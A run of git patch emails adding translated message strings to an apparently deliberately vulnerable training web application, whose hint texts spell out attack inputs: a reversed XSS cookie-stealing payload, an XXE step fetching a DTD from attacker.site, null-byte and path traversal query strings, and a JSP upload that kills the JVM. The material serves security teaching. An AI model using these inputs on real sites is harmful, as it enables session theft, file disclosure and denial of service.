+title.vulnerabileoidcrp.page=Login with OpenID Connect title.xee.page=Batch Registration of Users title.xss.page=Reverse String title.xxe.page=Batch Update of Users From be2238b217d3aa70d6d25277976e0e16ee6489cf Mon Sep 17 00:00:00 2001 From: Kohei Tamura Date: Thu, 24 Oct 2019 22:06:29 +0900 Subject: [PATCH 109/139] New translations messages.properties (English) --- src/main/resources/messages_en.properties | 7 +++++++ 1 file changed, 7 insertions(+) diff --git a/src/main/resources/messages_en.properties b/src/main/resources/messages_en.properties index 4310633..a04ce8f 100644 --- a/src/main/resources/messages_en.properties +++ b/src/main/resources/messages_en.properties @@ -62,6 +62,7 @@ function.description.unintended.file.disclosure=There is an unintended file disc function.description.unrestricted.ext.upload=This page is vulnerable for attacks such as code injection because there are no limitation for uploading file extension. function.description.unrestricted.size.upload=This page is vulnerable for attacks such as DoS because there are no limitation for uploading file size. function.description.verbose.error.message=It is easy to guess an account who can logs in because authentication error messages on this page are too detailed. +function.description.vulnerabileoidcrp=This page uses OpenID Connect for login, but it is vulnerable because of insufficient verification. function.description.xee=There is an XEE vulnerability in this page. function.description.xss=There is a cross site scripting vulnerability in this page. function.description.xxe=There is an XXE vulnerability in this page. @@ -107,6 +108,7 @@ function.name.unintended.file.disclosure=Unintended File Disclosure function.name.unrestricted.ext.upload=Extension Unrestricted File Upload function.name.unrestricted.size.upload=Size Unrestricted File Upload function.name.verbose.error.message=Verbose Authentication Error Messages +function.name.vulnerabileoidcrp=Login with Insufficient OpenID Connect Implementation function.name.xee=XEE (XML Entity Expansion) function.name.xss=XSS (Cross Site Scripting) function.name.xxe=XXE (XML External Entity) @@ -114,6 +116,8 @@ function.name.xxe=XXE (XML External Entity) label.access.time=Access Time label.access.number=Number of Accesses label.attach.file=Attach File +label.attribute.name=Attribute Name +label.attribute.value=Attribute Value label.available.characters=Available Characters label.browser=Browser label.calculate=Calculate @@ -210,6 +214,7 @@ msg.invalid.expression=Invalid expression \: {0} msg.invalid.json=Invalid JSON \: {0} msg.is.leap.year=It's a leap year. msg.is.not.leap.year=It insn't a leap year. +msg.login.with.openid.provider=Login with {0} msg.low.alphnum8=Password is 8 lowercase alphanumeric characters. msg.mail.change.failed=Mail address change failed. msg.mail.changed=Your mail address is successfully changed. @@ -259,6 +264,7 @@ msg.note.truncationerror=Truncation error occurs if you enter 3 or 7 or 9. msg.note.unrestrictedextupload=If you upload JSP file (named exit.jsp) including <% System.exit(0); %> and access to http\://localhost\:8080/uploadFiles/exit.jsp, then JavaVM is forcibly finished. msg.note.unrestrictedsizeupload=This page is vulnerable for attacks such as DoS because there are no limitation for uploading file size. msg.note.verbose.errror.message=You can login with admin and password. It is easy to guess an account who can logs in since authentication error messages on this page is too detailed. +msg.note.vulnerabileoidcrp=This page uses OpenID Connect for login, but it is vulnerable because of insufficient verification. msg.note.xee=If you upload the following XML file, it will waste server resources. msg.note.xss=Session ID is shown if you enter name to >tpircs/<;)eikooc.tnemucod(trela>tpIrcs< msg.note.xxe.step1=If you create the following DTD file on a web server that can be accessed from this server, for example, http\://attacker.site/vulnerable.dtd @@ -343,6 +349,7 @@ title.threadunsafe.page=Leap year determination title.truncationerror.page=Decimal Division title.unrestrictedextupload.page=Convert Gray Scale of Image File title.unrestrictedsizeupload.page=Reverse Color of Image File +title.vulnerabileoidcrp.page=Login with OpenID Connect title.xee.page=Batch Registration of Users title.xss.page=Reverse String title.xxe.page=Batch Update of Users From 0b8fb09a76067fb72a87eb3eee0761a63b23638f Mon Sep 17 00:00:00 2001 From: Kohei Tamura Date: Thu, 24 Oct 2019 22:06:32 +0900 Subject: [PATCH 110/139] New translations messages.properties (French) --- src/main/resources/messages_fr.properties | 7 +++++++ 1 file changed, 7 insertions(+) diff --git a/src/main/resources/messages_fr.properties b/src/main/resources/messages_fr.properties index 4310633..a04ce8f 100644 --- a/src/main/resources/messages_fr.properties +++ b/src/main/resources/messages_fr.properties @@ -62,6 +62,7 @@ function.description.unintended.file.disclosure=There is an unintended file disc function.description.unrestricted.ext.upload=This page is vulnerable for attacks such as code injection because there are no limitation for uploading file extension. function.description.unrestricted.size.upload=This page is vulnerable for attacks such as DoS because there are no limitation for uploading file size. function.description.verbose.error.message=It is easy to guess an account who can logs in because authentication error messages on this page are too detailed. +function.description.vulnerabileoidcrp=This page uses OpenID Connect for login, but it is vulnerable because of insufficient verification. function.description.xee=There is an XEE vulnerability in this page. function.description.xss=There is a cross site scripting vulnerability in this page. function.description.xxe=There is an XXE vulnerability in this page. @@ -107,6 +108,7 @@ function.name.unintended.file.disclosure=Unintended File Disclosure function.name.unrestricted.ext.upload=Extension Unrestricted File Upload function.name.unrestricted.size.upload=Size Unrestricted File Upload function.name.verbose.error.message=Verbose Authentication Error Messages +function.name.vulnerabileoidcrp=Login with Insufficient OpenID Connect Implementation function.name.xee=XEE (XML Entity Expansion) function.name.xss=XSS (Cross Site Scripting) function.name.xxe=XXE (XML External Entity) @@ -114,6 +116,8 @@ function.name.xxe=XXE (XML External Entity) label.access.time=Access Time label.access.number=Number of Accesses label.attach.file=Attach File +label.attribute.name=Attribute Name +label.attribute.value=Attribute Value label.available.characters=Available Characters label.browser=Browser label.calculate=Calculate @@ -210,6 +214,7 @@ msg.invalid.expression=Invalid expression \: {0} msg.invalid.json=Invalid JSON \: {0} msg.is.leap.year=It's a leap year. msg.is.not.leap.year=It insn't a leap year. +msg.login.with.openid.provider=Login with {0} msg.low.alphnum8=Password is 8 lowercase alphanumeric characters. msg.mail.change.failed=Mail address change failed. msg.mail.changed=Your mail address is successfully changed. @@ -259,6 +264,7 @@ msg.note.truncationerror=Truncation error occurs if you enter 3 or 7 or 9. msg.note.unrestrictedextupload=If you upload JSP file (named exit.jsp) including <% System.exit(0); %> and access to http\://localhost\:8080/uploadFiles/exit.jsp, then JavaVM is forcibly finished. msg.note.unrestrictedsizeupload=This page is vulnerable for attacks such as DoS because there are no limitation for uploading file size. msg.note.verbose.errror.message=You can login with admin and password. It is easy to guess an account who can logs in since authentication error messages on this page is too detailed. +msg.note.vulnerabileoidcrp=This page uses OpenID Connect for login, but it is vulnerable because of insufficient verification. msg.note.xee=If you upload the following XML file, it will waste server resources. msg.note.xss=Session ID is shown if you enter name to >tpircs/<;)eikooc.tnemucod(trela>tpIrcs< msg.note.xxe.step1=If you create the following DTD file on a web server that can be accessed from this server, for example, http\://attacker.site/vulnerable.dtd @@ -343,6 +349,7 @@ title.threadunsafe.page=Leap year determination title.truncationerror.page=Decimal Division title.unrestrictedextupload.page=Convert Gray Scale of Image File title.unrestrictedsizeupload.page=Reverse Color of Image File +title.vulnerabileoidcrp.page=Login with OpenID Connect title.xee.page=Batch Registration of Users title.xss.page=Reverse String title.xxe.page=Batch Update of Users From c6f22100dda2aaa68a6ea9be1eff6329e66c19c0 Mon Sep 17 00:00:00 2001 From: Kohei Tamura Date: Thu, 24 Oct 2019 22:06:34 +0900 Subject: [PATCH 111/139] New translations messages.properties (German) --- src/main/resources/messages_de.properties | 7 +++++++ 1 file changed, 7 insertions(+) diff --git a/src/main/resources/messages_de.properties b/src/main/resources/messages_de.properties index 4310633..a04ce8f 100644 --- a/src/main/resources/messages_de.properties +++ b/src/main/resources/messages_de.properties @@ -62,6 +62,7 @@ function.description.unintended.file.disclosure=There is an unintended file disc function.description.unrestricted.ext.upload=This page is vulnerable for attacks such as code injection because there are no limitation for uploading file extension. function.description.unrestricted.size.upload=This page is vulnerable for attacks such as DoS because there are no limitation for uploading file size. function.description.verbose.error.message=It is easy to guess an account who can logs in because authentication error messages on this page are too detailed. +function.description.vulnerabileoidcrp=This page uses OpenID Connect for login, but it is vulnerable because of insufficient verification. function.description.xee=There is an XEE vulnerability in this page. function.description.xss=There is a cross site scripting vulnerability in this page. function.description.xxe=There is an XXE vulnerability in this page. @@ -107,6 +108,7 @@ function.name.unintended.file.disclosure=Unintended File Disclosure function.name.unrestricted.ext.upload=Extension Unrestricted File Upload function.name.unrestricted.size.upload=Size Unrestricted File Upload function.name.verbose.error.message=Verbose Authentication Error Messages +function.name.vulnerabileoidcrp=Login with Insufficient OpenID Connect Implementation function.name.xee=XEE (XML Entity Expansion) function.name.xss=XSS (Cross Site Scripting) function.name.xxe=XXE (XML External Entity) @@ -114,6 +116,8 @@ function.name.xxe=XXE (XML External Entity) label.access.time=Access Time label.access.number=Number of Accesses label.attach.file=Attach File +label.attribute.name=Attribute Name +label.attribute.value=Attribute Value label.available.characters=Available Characters label.browser=Browser label.calculate=Calculate @@ -210,6 +214,7 @@ msg.invalid.expression=Invalid expression \: {0} msg.invalid.json=Invalid JSON \: {0} msg.is.leap.year=It's a leap year. msg.is.not.leap.year=It insn't a leap year. +msg.login.with.openid.provider=Login with {0} msg.low.alphnum8=Password is 8 lowercase alphanumeric characters. msg.mail.change.failed=Mail address change failed. msg.mail.changed=Your mail address is successfully changed. @@ -259,6 +264,7 @@ msg.note.truncationerror=Truncation error occurs if you enter 3 or 7 or 9. msg.note.unrestrictedextupload=If you upload JSP file (named exit.jsp) including <% System.exit(0); %> and access to http\://localhost\:8080/uploadFiles/exit.jsp, then JavaVM is forcibly finished. msg.note.unrestrictedsizeupload=This page is vulnerable for attacks such as DoS because there are no limitation for uploading file size. msg.note.verbose.errror.message=You can login with admin and password. It is easy to guess an account who can logs in since authentication error messages on this page is too detailed. +msg.note.vulnerabileoidcrp=This page uses OpenID Connect for login, but it is vulnerable because of insufficient verification. msg.note.xee=If you upload the following XML file, it will waste server resources. msg.note.xss=Session ID is shown if you enter name to >tpircs/<;)eikooc.tnemucod(trela>tpIrcs< msg.note.xxe.step1=If you create the following DTD file on a web server that can be accessed from this server, for example, http\://attacker.site/vulnerable.dtd @@ -343,6 +349,7 @@ title.threadunsafe.page=Leap year determination title.truncationerror.page=Decimal Division title.unrestrictedextupload.page=Convert Gray Scale of Image File title.unrestrictedsizeupload.page=Reverse Color of Image File +title.vulnerabileoidcrp.page=Login with OpenID Connect title.xee.page=Batch Registration of Users title.xss.page=Reverse String title.xxe.page=Batch Update of Users From 3ae7e4981519111301c6899a1a7ea936db8e9b8c Mon Sep 17 00:00:00 2001 From: Kohei Tamura Date: Thu, 24 Oct 2019 22:06:37 +0900 Subject: [PATCH 112/139] New translations messages.properties (Japanese) --- src/main/resources/messages_ja.properties | 7 +++++++ 1 file changed, 7 insertions(+) diff --git a/src/main/resources/messages_ja.properties b/src/main/resources/messages_ja.properties index 9cdeb22..f732004 100644 --- a/src/main/resources/messages_ja.properties +++ b/src/main/resources/messages_ja.properties @@ -62,6 +62,7 @@ function.description.unintended.file.disclosure=\u3053\u306e\u30da\u30fc\u30b8\u function.description.unrestricted.ext.upload=This page is vulnerable for attacks such as code injection because there are no limitation for uploading file extension. function.description.unrestricted.size.upload=This page is vulnerable for attacks such as DoS because there are no limitation for uploading file size. function.description.verbose.error.message=\u3053\u306e\u30ed\u30b0\u30a4\u30f3\u30da\u30fc\u30b8\u306e\u30a8\u30e9\u30fc\u30e1\u30c3\u30bb\u30fc\u30b8\u306f\u89aa\u5207\u904e\u304e\u308b\u305f\u3081\u3001ID\u3068\u30d1\u30b9\u30ef\u30fc\u30c9\u304c\u63a8\u6e2c\u3055\u308c\u308b\u53ef\u80fd\u6027\u304c\u9ad8\u3044\u3067\u3059\u3002 +function.description.vulnerabileoidcrp=This page uses OpenID Connect for login, but it is vulnerable because of insufficient verification. function.description.xee=\u3053\u306e\u30da\u30fc\u30b8\u306b\u306fXEE\u306e\u8106\u5f31\u6027\u304c\u3042\u308a\u307e\u3059\u3002 function.description.xss=\u3053\u306e\u30da\u30fc\u30b8\u306b\u306fXSS\u306e\u8106\u5f31\u6027\u304c\u3042\u308a\u307e\u3059\u3002 function.description.xxe=\u3053\u306e\u30da\u30fc\u30b8\u306b\u306fXXE\u306e\u8106\u5f31\u6027\u304c\u3042\u308a\u307e\u3059\u3002 @@ -107,6 +108,7 @@ function.name.unintended.file.disclosure=\u610f\u56f3\u3057\u306a\u3044\u30d5\u3 function.name.unrestricted.ext.upload=\u62e1\u5f35\u5b50\u5236\u9650\u306e\u7121\u3044\u30d5\u30a1\u30a4\u30eb\u30a2\u30c3\u30d7\u30ed\u30fc\u30c9 function.name.unrestricted.size.upload=\u30b5\u30a4\u30ba\u5236\u9650\u306e\u7121\u3044\u30d5\u30a1\u30a4\u30eb\u30a2\u30c3\u30d7\u30ed\u30fc\u30c9 function.name.verbose.error.message=\u89aa\u5207\u904e\u304e\u308b\u8a8d\u8a3c\u30a8\u30e9\u30fc\u30e1\u30c3\u30bb\u30fc\u30b8 +function.name.vulnerabileoidcrp=Login with Insufficient OpenID Connect Implementation function.name.xee=XEE (XML\u30a8\u30f3\u30c6\u30a3\u30c6\u30a3\u62e1\u5f35) function.name.xss=XSS (\u30af\u30ed\u30b9\u30b5\u30a4\u30c8\u30b9\u30af\u30ea\u30d7\u30c6\u30a3\u30f3\u30b0) function.name.xxe=XXE (XML\u5916\u90e8\u30a8\u30f3\u30c6\u30a3\u30c6\u30a3) @@ -114,6 +116,8 @@ function.name.xxe=XXE (XML\u5916\u90e8\u30a8\u30f3\u30c6\u30a3\u30c6\u30a3) label.access.time=\u30a2\u30af\u30bb\u30b9\u6642\u523b label.access.number=Number of Accesses label.attach.file=\u6dfb\u4ed8\u30d5\u30a1\u30a4\u30eb +label.attribute.name=Attribute Name +label.attribute.value=Attribute Value label.available.characters=\u5229\u7528\u53ef\u80fd\u306a\u6587\u5b57 label.browser=\u30d6\u30e9\u30a6\u30b6 label.calculate=\u8a08\u7b97\u3059\u308b @@ -210,6 +214,7 @@ msg.invalid.expression=\u4e0d\u6b63\u306a\u6570\u5f0f\u3067\u3059 \: {0} msg.invalid.json=\u4e0d\u6b63\u306aJSON\u6587\u5b57\u5217\u3067\u3059 \: {0} msg.is.leap.year=It's a leap year. msg.is.not.leap.year=It insn't a leap year. +msg.login.with.openid.provider=Login with {0} msg.low.alphnum8=\u30d1\u30b9\u30ef\u30fc\u30c9\u306f8\u6841\u306e\u82f1\u6570\u5b57\u3067\u3059\u3002 msg.mail.change.failed=\u30e1\u30fc\u30eb\u30a2\u30c9\u30ec\u30b9\u306e\u5909\u66f4\u306b\u5931\u6557\u3057\u307e\u3057\u305f\u3002 msg.mail.changed=\u30e1\u30fc\u30eb\u30a2\u30c9\u30ec\u30b9\u306f\u6b63\u5e38\u306b\u5909\u66f4\u3055\u308c\u307e\u3057\u305f\u3002 @@ -259,6 +264,7 @@ msg.note.truncationerror=3\u30017\u30019\u3092\u5165\u529b\u3059\u308b\u3068\u30 msg.note.unrestrictedextupload=If you upload JSP file (named exit.jsp) including <% System.exit(0); %> and access to http\://localhost\:8080/uploadFiles/exit.jsp, then JavaVM is forcibly finished. msg.note.unrestrictedsizeupload=\u30a2\u30c3\u30d7\u30ed\u30fc\u30c9\u53ef\u80fd\u306a\u30d5\u30a1\u30a4\u30eb\u30b5\u30a4\u30ba\u306e\u5236\u9650\u304c\u7121\u3044\u305f\u3081\u3001DoS\u653b\u6483\u306a\u3069\u306b\u5bfe\u3057\u3066\u8106\u5f31\u3067\u3059\u3002 msg.note.verbose.errror.message=You can login with admin and password. It is easy to guess an account who can logs in since authentication error messages on this page is too detailed. +msg.note.vulnerabileoidcrp=This page uses OpenID Connect for login, but it is vulnerable because of insufficient verification. msg.note.xee=\u4ee5\u4e0b\u306eXML\u30d5\u30a1\u30a4\u30eb\u3092\u30a2\u30c3\u30d7\u30ed\u30fc\u30c9\u3059\u308b\u3068\u3001\u30b5\u30fc\u30d0\u30fc\u30ea\u30bd\u30fc\u30b9\u3092\u6d6a\u8cbb\u3057\u307e\u3059\u3002 msg.note.xss=\u540d\u524d\u306b>tpircs/<;)eikooc.tnemucod(trela>tpIrcs<\u3092\u5165\u529b\u3059\u308b\u3068\u3001\u30bb\u30c3\u30b7\u30e7\u30f3ID\u304c\u8868\u793a\u3055\u308c\u307e\u3059\u3002 msg.note.xxe.step1=\u3053\u306e\u30b5\u30fc\u30d0\u30fc\u304b\u3089\u30a2\u30af\u30bb\u30b9\u3067\u304d\u308bWeb\u30b5\u30fc\u30d0\u30fc\u306b\u6b21\u306eDTD\u30d5\u30a1\u30a4\u30eb\u3092\u4f5c\u6210\u3057\u307e\u3059\u3002\u4f8b) http\://attacker.site/vulnerable.dtd @@ -343,6 +349,7 @@ title.threadunsafe.page=Leap year determination title.truncationerror.page=\u5c0f\u6570\u306e\u5272\u308a\u7b97 title.unrestrictedextupload.page=\u753b\u50cf\u30d5\u30a1\u30a4\u30eb\u306e\u30b0\u30ec\u30fc\u30b9\u30b1\u30fc\u30eb\u5909\u63db title.unrestrictedsizeupload.page=\u753b\u50cf\u30d5\u30a1\u30a4\u30eb\u306e\u8272\u53cd\u8ee2 +title.vulnerabileoidcrp.page=Login with OpenID Connect title.xee.page=\u30e6\u30fc\u30b6\u30fc\u306e\u4e00\u62ec\u767b\u9332 title.xss.page=\u6587\u5b57\u5217\u306e\u9006\u8ee2 title.xxe.page=\u30e6\u30fc\u30b6\u30fc\u306e\u4e00\u62ec\u66f4\u65b0 From ce89cf0065d13bea72f528228e7d1f08cdab3cc7 Mon Sep 17 00:00:00 2001 From: Kohei Tamura Date: Thu, 24 Oct 2019 22:06:40 +0900 Subject: [PATCH 113/139] New translations messages.properties (Korean) --- src/main/resources/messages_ko.properties | 7 +++++++ 1 file changed, 7 insertions(+) diff --git a/src/main/resources/messages_ko.properties b/src/main/resources/messages_ko.properties index 4310633..a04ce8f 100644 --- a/src/main/resources/messages_ko.properties +++ b/src/main/resources/messages_ko.properties @@ -62,6 +62,7 @@ function.description.unintended.file.disclosure=There is an unintended file disc function.description.unrestricted.ext.upload=This page is vulnerable for attacks such as code injection because there are no limitation for uploading file extension. function.description.unrestricted.size.upload=This page is vulnerable for attacks such as DoS because there are no limitation for uploading file size. function.description.verbose.error.message=It is easy to guess an account who can logs in because authentication error messages on this page are too detailed. +function.description.vulnerabileoidcrp=This page uses OpenID Connect for login, but it is vulnerable because of insufficient verification. function.description.xee=There is an XEE vulnerability in this page. function.description.xss=There is a cross site scripting vulnerability in this page. function.description.xxe=There is an XXE vulnerability in this page. @@ -107,6 +108,7 @@ function.name.unintended.file.disclosure=Unintended File Disclosure function.name.unrestricted.ext.upload=Extension Unrestricted File Upload function.name.unrestricted.size.upload=Size Unrestricted File Upload function.name.verbose.error.message=Verbose Authentication Error Messages +function.name.vulnerabileoidcrp=Login with Insufficient OpenID Connect Implementation function.name.xee=XEE (XML Entity Expansion) function.name.xss=XSS (Cross Site Scripting) function.name.xxe=XXE (XML External Entity) @@ -114,6 +116,8 @@ function.name.xxe=XXE (XML External Entity) label.access.time=Access Time label.access.number=Number of Accesses label.attach.file=Attach File +label.attribute.name=Attribute Name +label.attribute.value=Attribute Value label.available.characters=Available Characters label.browser=Browser label.calculate=Calculate @@ -210,6 +214,7 @@ msg.invalid.expression=Invalid expression \: {0} msg.invalid.json=Invalid JSON \: {0} msg.is.leap.year=It's a leap year. msg.is.not.leap.year=It insn't a leap year. +msg.login.with.openid.provider=Login with {0} msg.low.alphnum8=Password is 8 lowercase alphanumeric characters. msg.mail.change.failed=Mail address change failed. msg.mail.changed=Your mail address is successfully changed. @@ -259,6 +264,7 @@ msg.note.truncationerror=Truncation error occurs if you enter 3 or 7 or 9. msg.note.unrestrictedextupload=If you upload JSP file (named exit.jsp) including <% System.exit(0); %> and access to http\://localhost\:8080/uploadFiles/exit.jsp, then JavaVM is forcibly finished. msg.note.unrestrictedsizeupload=This page is vulnerable for attacks such as DoS because there are no limitation for uploading file size. msg.note.verbose.errror.message=You can login with admin and password. It is easy to guess an account who can logs in since authentication error messages on this page is too detailed. +msg.note.vulnerabileoidcrp=This page uses OpenID Connect for login, but it is vulnerable because of insufficient verification. msg.note.xee=If you upload the following XML file, it will waste server resources. msg.note.xss=Session ID is shown if you enter name to >tpircs/<;)eikooc.tnemucod(trela>tpIrcs< msg.note.xxe.step1=If you create the following DTD file on a web server that can be accessed from this server, for example, http\://attacker.site/vulnerable.dtd @@ -343,6 +349,7 @@ title.threadunsafe.page=Leap year determination title.truncationerror.page=Decimal Division title.unrestrictedextupload.page=Convert Gray Scale of Image File title.unrestrictedsizeupload.page=Reverse Color of Image File +title.vulnerabileoidcrp.page=Login with OpenID Connect title.xee.page=Batch Registration of Users title.xss.page=Reverse String title.xxe.page=Batch Update of Users From 808f4aac8b9b8f185af4a1b9b56c38fa4359e4c6 Mon Sep 17 00:00:00 2001 From: Kohei Tamura Date: Thu, 24 Oct 2019 22:06:43 +0900 Subject: [PATCH 114/139] New translations messages.properties (Russian) --- src/main/resources/messages_ru.properties | 7 +++++++ 1 file changed, 7 insertions(+) diff --git a/src/main/resources/messages_ru.properties b/src/main/resources/messages_ru.properties index 4310633..a04ce8f 100644 --- a/src/main/resources/messages_ru.properties +++ b/src/main/resources/messages_ru.properties @@ -62,6 +62,7 @@ function.description.unintended.file.disclosure=There is an unintended file disc function.description.unrestricted.ext.upload=This page is vulnerable for attacks such as code injection because there are no limitation for uploading file extension. function.description.unrestricted.size.upload=This page is vulnerable for attacks such as DoS because there are no limitation for uploading file size. function.description.verbose.error.message=It is easy to guess an account who can logs in because authentication error messages on this page are too detailed. +function.description.vulnerabileoidcrp=This page uses OpenID Connect for login, but it is vulnerable because of insufficient verification. function.description.xee=There is an XEE vulnerability in this page. function.description.xss=There is a cross site scripting vulnerability in this page. function.description.xxe=There is an XXE vulnerability in this page. @@ -107,6 +108,7 @@ function.name.unintended.file.disclosure=Unintended File Disclosure function.name.unrestricted.ext.upload=Extension Unrestricted File Upload function.name.unrestricted.size.upload=Size Unrestricted File Upload function.name.verbose.error.message=Verbose Authentication Error Messages +function.name.vulnerabileoidcrp=Login with Insufficient OpenID Connect Implementation function.name.xee=XEE (XML Entity Expansion) function.name.xss=XSS (Cross Site Scripting) function.name.xxe=XXE (XML External Entity) @@ -114,6 +116,8 @@ function.name.xxe=XXE (XML External Entity) label.access.time=Access Time label.access.number=Number of Accesses label.attach.file=Attach File +label.attribute.name=Attribute Name +label.attribute.value=Attribute Value label.available.characters=Available Characters label.browser=Browser label.calculate=Calculate @@ -210,6 +214,7 @@ msg.invalid.expression=Invalid expression \: {0} msg.invalid.json=Invalid JSON \: {0} msg.is.leap.year=It's a leap year. msg.is.not.leap.year=It insn't a leap year. +msg.login.with.openid.provider=Login with {0} msg.low.alphnum8=Password is 8 lowercase alphanumeric characters. msg.mail.change.failed=Mail address change failed. msg.mail.changed=Your mail address is successfully changed. @@ -259,6 +264,7 @@ msg.note.truncationerror=Truncation error occurs if you enter 3 or 7 or 9. msg.note.unrestrictedextupload=If you upload JSP file (named exit.jsp) including <% System.exit(0); %> and access to http\://localhost\:8080/uploadFiles/exit.jsp, then JavaVM is forcibly finished. msg.note.unrestrictedsizeupload=This page is vulnerable for attacks such as DoS because there are no limitation for uploading file size. msg.note.verbose.errror.message=You can login with admin and password. It is easy to guess an account who can logs in since authentication error messages on this page is too detailed. +msg.note.vulnerabileoidcrp=This page uses OpenID Connect for login, but it is vulnerable because of insufficient verification. msg.note.xee=If you upload the following XML file, it will waste server resources. msg.note.xss=Session ID is shown if you enter name to >tpircs/<;)eikooc.tnemucod(trela>tpIrcs< msg.note.xxe.step1=If you create the following DTD file on a web server that can be accessed from this server, for example, http\://attacker.site/vulnerable.dtd @@ -343,6 +349,7 @@ title.threadunsafe.page=Leap year determination title.truncationerror.page=Decimal Division title.unrestrictedextupload.page=Convert Gray Scale of Image File title.unrestrictedsizeupload.page=Reverse Color of Image File +title.vulnerabileoidcrp.page=Login with OpenID Connect title.xee.page=Batch Registration of Users title.xss.page=Reverse String title.xxe.page=Batch Update of Users From 82fe1f458b65bf29cf2642359770ad10d4dc3d67 Mon Sep 17 00:00:00 2001 From: Kohei Tamura Date: Thu, 24 Oct 2019 22:06:46 +0900 Subject: [PATCH 115/139] New translations messages.properties (Spanish) --- src/main/resources/messages_es.properties | 7 +++++++ 1 file changed, 7 insertions(+) diff --git a/src/main/resources/messages_es.properties b/src/main/resources/messages_es.properties index 4310633..a04ce8f 100644 --- a/src/main/resources/messages_es.properties +++ b/src/main/resources/messages_es.properties @@ -62,6 +62,7 @@ function.description.unintended.file.disclosure=There is an unintended file disc function.description.unrestricted.ext.upload=This page is vulnerable for attacks such as code injection because there are no limitation for uploading file extension. function.description.unrestricted.size.upload=This page is vulnerable for attacks such as DoS because there are no limitation for uploading file size. function.description.verbose.error.message=It is easy to guess an account who can logs in because authentication error messages on this page are too detailed. +function.description.vulnerabileoidcrp=This page uses OpenID Connect for login, but it is vulnerable because of insufficient verification. function.description.xee=There is an XEE vulnerability in this page. function.description.xss=There is a cross site scripting vulnerability in this page. function.description.xxe=There is an XXE vulnerability in this page. @@ -107,6 +108,7 @@ function.name.unintended.file.disclosure=Unintended File Disclosure function.name.unrestricted.ext.upload=Extension Unrestricted File Upload function.name.unrestricted.size.upload=Size Unrestricted File Upload function.name.verbose.error.message=Verbose Authentication Error Messages +function.name.vulnerabileoidcrp=Login with Insufficient OpenID Connect Implementation function.name.xee=XEE (XML Entity Expansion) function.name.xss=XSS (Cross Site Scripting) function.name.xxe=XXE (XML External Entity) @@ -114,6 +116,8 @@ function.name.xxe=XXE (XML External Entity) label.access.time=Access Time label.access.number=Number of Accesses label.attach.file=Attach File +label.attribute.name=Attribute Name +label.attribute.value=Attribute Value label.available.characters=Available Characters label.browser=Browser label.calculate=Calculate @@ -210,6 +214,7 @@ msg.invalid.expression=Invalid expression \: {0} msg.invalid.json=Invalid JSON \: {0} msg.is.leap.year=It's a leap year. msg.is.not.leap.year=It insn't a leap year. +msg.login.with.openid.provider=Login with {0} msg.low.alphnum8=Password is 8 lowercase alphanumeric characters. msg.mail.change.failed=Mail address change failed. msg.mail.changed=Your mail address is successfully changed. @@ -259,6 +264,7 @@ msg.note.truncationerror=Truncation error occurs if you enter 3 or 7 or 9. msg.note.unrestrictedextupload=If you upload JSP file (named exit.jsp) including <% System.exit(0); %> and access to http\://localhost\:8080/uploadFiles/exit.jsp, then JavaVM is forcibly finished. msg.note.unrestrictedsizeupload=This page is vulnerable for attacks such as DoS because there are no limitation for uploading file size. msg.note.verbose.errror.message=You can login with admin and password. It is easy to guess an account who can logs in since authentication error messages on this page is too detailed. +msg.note.vulnerabileoidcrp=This page uses OpenID Connect for login, but it is vulnerable because of insufficient verification. msg.note.xee=If you upload the following XML file, it will waste server resources. msg.note.xss=Session ID is shown if you enter name to >tpircs/<;)eikooc.tnemucod(trela>tpIrcs< msg.note.xxe.step1=If you create the following DTD file on a web server that can be accessed from this server, for example, http\://attacker.site/vulnerable.dtd @@ -343,6 +349,7 @@ title.threadunsafe.page=Leap year determination title.truncationerror.page=Decimal Division title.unrestrictedextupload.page=Convert Gray Scale of Image File title.unrestrictedsizeupload.page=Reverse Color of Image File +title.vulnerabileoidcrp.page=Login with OpenID Connect title.xee.page=Batch Registration of Users title.xss.page=Reverse String title.xxe.page=Batch Update of Users From e1c67c94625e5e8c3c30926b49f1fc6a8c8bf23f Mon Sep 17 00:00:00 2001 From: Kohei Tamura Date: Fri, 25 Oct 2019 19:24:38 +0900 Subject: [PATCH 116/139] New translations messages.properties (Chinese Simplified) --- src/main/resources/messages_zh.properties | 2 ++ 1 file changed, 2 insertions(+) diff --git a/src/main/resources/messages_zh.properties b/src/main/resources/messages_zh.properties index a04ce8f..e270424 100644 --- a/src/main/resources/messages_zh.properties +++ b/src/main/resources/messages_zh.properties @@ -250,6 +250,7 @@ msg.note.mojibake=Mojibake occurs if you enter a multi-byte string. msg.note.netsocketleak=Network socket leak occurs every time you load this page. msg.note.not.use.ext.db=Database connection leak occurs if using an external RDBMS such as MySQL. Please edit application.properties if using an external RDBMS. msg.note.nullbyteinjection=If using Java earlier than version 1.7.0_40 and you add fileName\=../WEB-INF/web.xml%00 to the query string, then you can download a file which includes the content of web.xml. +msg.note.oidc.invalid.config=To use this feature, you need to define appropriate OpenID Connect properties in application.properties. msg.note.open.redirect=You can login with admin and password. If you add goto\=[an URL of a malicious site] to the query string, you can redirect to the malicious site. msg.note.path.traversal=Change the query string to template\=../uid/adminpassword.txt?, then you can see the content of adminpassword.txt in this page. msg.note.roundofferror=Round off error occurs if you enter 1. @@ -349,6 +350,7 @@ title.threadunsafe.page=Leap year determination title.truncationerror.page=Decimal Division title.unrestrictedextupload.page=Convert Gray Scale of Image File title.unrestrictedsizeupload.page=Reverse Color of Image File +title.userinfo.page=User Information title.vulnerabileoidcrp.page=Login with OpenID Connect title.xee.page=Batch Registration of Users title.xss.page=Reverse String From b057e554588a8ff22eea546e6e371516461cc3c1 Mon Sep 17 00:00:00 2001 From: Kohei Tamura Date: Fri, 25 Oct 2019 19:24:42 +0900 Subject: [PATCH 117/139] New translations messages.properties (English) --- src/main/resources/messages_en.properties | 2 ++ 1 file changed, 2 insertions(+) diff --git a/src/main/resources/messages_en.properties b/src/main/resources/messages_en.properties index a04ce8f..e270424 100644 --- a/src/main/resources/messages_en.properties +++ b/src/main/resources/messages_en.properties @@ -250,6 +250,7 @@ msg.note.mojibake=Mojibake occurs if you enter a multi-byte string. msg.note.netsocketleak=Network socket leak occurs every time you load this page. msg.note.not.use.ext.db=Database connection leak occurs if using an external RDBMS such as MySQL. Please edit application.properties if using an external RDBMS. msg.note.nullbyteinjection=If using Java earlier than version 1.7.0_40 and you add fileName\=../WEB-INF/web.xml%00 to the query string, then you can download a file which includes the content of web.xml. +msg.note.oidc.invalid.config=To use this feature, you need to define appropriate OpenID Connect properties in application.properties. msg.note.open.redirect=You can login with admin and password. If you add goto\=[an URL of a malicious site] to the query string, you can redirect to the malicious site. msg.note.path.traversal=Change the query string to template\=../uid/adminpassword.txt?, then you can see the content of adminpassword.txt in this 